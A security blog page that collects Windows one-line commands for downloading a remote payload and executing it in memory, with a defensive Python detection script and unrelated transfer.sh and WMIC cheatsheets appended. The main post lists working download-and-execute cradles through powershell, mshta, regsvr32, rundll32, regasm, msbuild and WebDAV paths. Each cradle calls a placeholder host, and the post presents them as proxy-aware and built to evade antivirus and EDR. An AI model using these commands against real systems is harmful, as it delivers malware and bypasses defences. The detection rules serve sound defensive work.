How can malware download a remote payload and execute malicious code… in one line?

This post on arno0x0x’s blog is awesome: an accurate analysis of some ‘one-line commands’ that can be used on a Windows system to download a malicious payload and execute it.

The examples are written in several scripting languages; they work in memory with a minimal disk footprint and are “proxy aware”, so they can also be executed from inside a corporate network.

Priceless information for any malware analyst!

Prerequisites

  • allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits huh?
  • allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, will it?
  • be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays?
  • make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as many systems as possible
  • be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet?
  • work in memory only – because your final payload might get caught by AV when written on disk

Examples

Powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

Process performing network call: powershell.exe
Payload written on disk: NO

Cmd

cmd.exe /k < \\webdavserver\folder\batchfile.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cscript/Wscript

cscript //E:jscript \\webdavserver\folder\payload.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Process performing network call: mshta.exe
Payload written on disk: IE local cache

Rundll32

rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regasm/Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Process performing network call: regsvr32.exe
Payload written on disk: IE local cache

Msbuild

cmd /V/c"set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache
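Read from the defender's side, the two lines under each one-liner ("Process performing network call" and "Payload written on disk") are the detection hints: for the WebDAV variants the binary that gets abused never touches the network itself, so the command line is the only place to catch them. The following is an added example, not code from this post or from arno0x0x's article: a small Python rule set that flags the command-line shapes listed above in process-creation events and records which process the table says will make the network call. The events are constructed here as (Image, CommandLine) pairs, the rule names are mine, and the hostnames webserver/webdavserver are the placeholders the page already uses.

```python
"""Flag the one-liner shapes from the table above in process-creation events.

Added example, not code from the original post or from arno0x0x's article.
Events are constructed as (Image, CommandLine) pairs, roughly what a
Sysmon Event ID 1 or an EDR process-creation record carries.
"""
import re
from typing import NamedTuple, Optional


class Rule(NamedTuple):
    name: str                    # label for the one-liner family (naming is mine)
    images: Optional[frozenset]  # executable names the rule applies to; None = any image
    patterns: tuple              # every regex must match the command line
    net_process: str             # who performs the network call, per the table above


# A UNC path prefix such as \\server\share: two literal backslashes, a host, a backslash.
UNC = r"\\\\[\w.-]+\\"

WEBDAV = "svchost.exe (WebDAV client; the abused binary makes no network call itself)"

RULES = [
    Rule("powershell-download-cradle", frozenset({"powershell.exe", "pwsh.exe"}),
         (r"(?i)\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b",
          r"(?i)\b(iex|invoke-expression)\b"), "powershell.exe"),
    Rule("cmd-webdav-stdin", frozenset({"cmd.exe"}),
         (r"/[kc]\s*<\s*" + UNC,), WEBDAV),
    # Logon scripts on internal file servers also match; allow-list those hosts.
    Rule("script-host-webdav", frozenset({"cscript.exe", "wscript.exe"}),
         (UNC,), WEBDAV),
    Rule("mshta-remote-scriptlet", frozenset({"mshta.exe"}),
         (r"(?i)(vbscript|javascript):", r"(?i)(https?://|script:)"), "mshta.exe"),
    Rule("rundll32-unc-dll", frozenset({"rundll32.exe"}),
         (UNC + r".*\.dll",), WEBDAV),
    Rule("regasm-unc-dll", frozenset({"regasm.exe", "regsvcs.exe"}),
         (UNC + r".*\.dll",), WEBDAV),
    Rule("regsvr32-remote-scriptlet", frozenset({"regsvr32.exe"}),
         (r"(?i)/i:https?://", r"(?i)scrobj\.dll"), "regsvr32.exe"),
    # The MSBuild one-liner is launched through cmd.exe, so match on the command line only.
    Rule("msbuild-unc-project", None,
         (r"(?i)msbuild\.exe", UNC + r".*\.(xml|\w*proj)\b"), WEBDAV),
]


def image_name(image: str) -> str:
    """Lower-cased executable name taken from a full image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(image: str, cmdline: str) -> list:
    """Return the rules whose image set and every command-line pattern match."""
    name = image_name(image)
    return [r for r in RULES
            if (r.images is None or name in r.images)
            and all(re.search(p, cmdline) for p in r.patterns)]


def scan(events) -> list:
    """Return (image name, rule name, expected network process) per hit, in event order."""
    findings = []
    for image, cmdline in events:
        for rule in match_rules(image, cmdline):
            findings.append((image_name(image), rule.name, rule.net_process))
    return findings


SYS32 = r"C:\Windows\System32"
NET = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319"

SAMPLE_EVENTS = [  # constructed events; the command lines are the ones listed above
    (SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     r'''powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"'''),
    (SYS32 + r"\cmd.exe", r"cmd.exe /k < \\webdavserver\folder\batchfile.txt"),
    (SYS32 + r"\cscript.exe", r"cscript //E:jscript \\webdavserver\folder\payload.txt"),
    (SYS32 + r"\mshta.exe", r'mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))'),
    (SYS32 + r"\rundll32.exe", r"rundll32 \\webdavserver\folder\payload.dll,entrypoint"),
    (NET + r"\regasm.exe", NET + r"\regasm.exe /u \\webdavserver\folder\payload.dll"),
    (SYS32 + r"\regsvr32.exe", r"regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll"),
    (SYS32 + r"\cmd.exe",
     r'cmd /V/c"set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"'),
    (NET + r"\MSBuild.exe", '"' + NET + r'\MSBuild.exe" /noautoresponse /preprocess \\webdavserver\folder\payload.xml'),
    # benign look-alikes that must not fire
    (SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe", "powershell -c Get-Date"),
    (SYS32 + r"\regsvr32.exe", r'regsvr32 /s "C:\Program Files\Vendor\component.dll"'),
    (SYS32 + r"\rundll32.exe", "rundll32 shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for name, rule, net in scan(SAMPLE_EVENTS):
        print(f"{name:16} {rule:28} network call expected from: {net}")
```

The `net_process` field is what turns the table into a correlation hint: a network connection from mshta.exe, regsvr32.exe or powershell.exe is worth an alert on its own, while for the WebDAV-based one-liners the connection comes from svchost.exe and looks like any other WebDAV traffic, so the command-line rule (and the WebDAV client cache named in the "Payload written on disk" lines) is where those get caught.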


For more information and examples, please refer to arno0x0x’s article:

Windows oneliners to download remote payload and execute arbitrary code

Share files from command line with transfer.sh: a simple cheatsheet

Transfer.sh is a website that lets users share files from the command line in an efficient way.
It doesn’t require any additional software except cURL.

If your Linux distribution doesn’t have cURL (unlikely!), on Debian-based systems you can install it with

sudo apt install curl

The service is free and allows users to upload files of up to 10 GB, which are automatically deleted from the server after 14 days.

Here is a brief cheatsheet.

Upload

$ curl --upload-file ./hello.txt https://transfer.sh/hello.txt

Encrypt & upload

$ cat /tmp/hello.txt|gpg -ac -o-|curl -X PUT --upload-file "-" https://transfer.sh/test.txt

Download & decrypt

$ curl https://transfer.sh/1lDau/test.txt|gpg -o- > /tmp/hello.txt

Upload and check with VirusTotal

$ curl -X PUT --upload-file nhgbhhj https://transfer.sh/test.txt/virustotal

Bash/Zsh alias

Add to your .bashrc or .zshrc:

transfer() {
  # write the output to a temp file, because the progress bar would otherwise mix with the returned URL
  local tmpfile
  tmpfile=$(mktemp -t transferXXX)
  # quote the file name and URL so paths with spaces work
  curl --progress-bar --upload-file "$1" "https://transfer.sh/$(basename "$1")" >> "$tmpfile"
  cat "$tmpfile"
  rm -f "$tmpfile"
}

alias transfer=transfer

Usage:

$ transfer test.txt

Windows Command Line cheatsheet (part 2): WMIC

This command-line tool is really useful for both penetration testing and forensics tasks.

The previous article raised interest among readers regarding WMIC, so I decided to write an article dedicated to this tool.

If you’ve done any scripting for the Windows platform, you’ve probably bumped into the Windows Management Instrumentation (WMI) scripting API, which can be used to enumerate all kinds of information.
